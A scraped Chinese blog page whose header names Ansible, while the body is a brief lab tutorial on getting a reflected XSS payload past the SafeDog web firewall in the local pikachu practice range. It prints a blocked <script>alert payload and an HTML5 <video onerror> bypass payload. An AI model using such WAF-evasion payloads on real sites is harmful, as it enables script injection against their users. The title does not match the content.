0
点赞
收藏
分享

微信扫一扫

Ansible语法与模块

陬者 2024-06-10 阅读 11

环境准备:

  • 43-5 waf绕过 - 安全狗简介及安装-CSDN博客
  • 然后安装pikachu靶场:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客

打开pikachu靶场

http://127.0.0.1/pikachu-master/vul/xss/xss_reflected_get.php

使用常见payload被安全狗拦截

<script>alert("@@")</script>

绕过

1)HTME5新标签<video>绕过:

绕过payload:

<video src=1 onerror=alert(/渣渣辉/)>
举报

相关推荐

0 条评论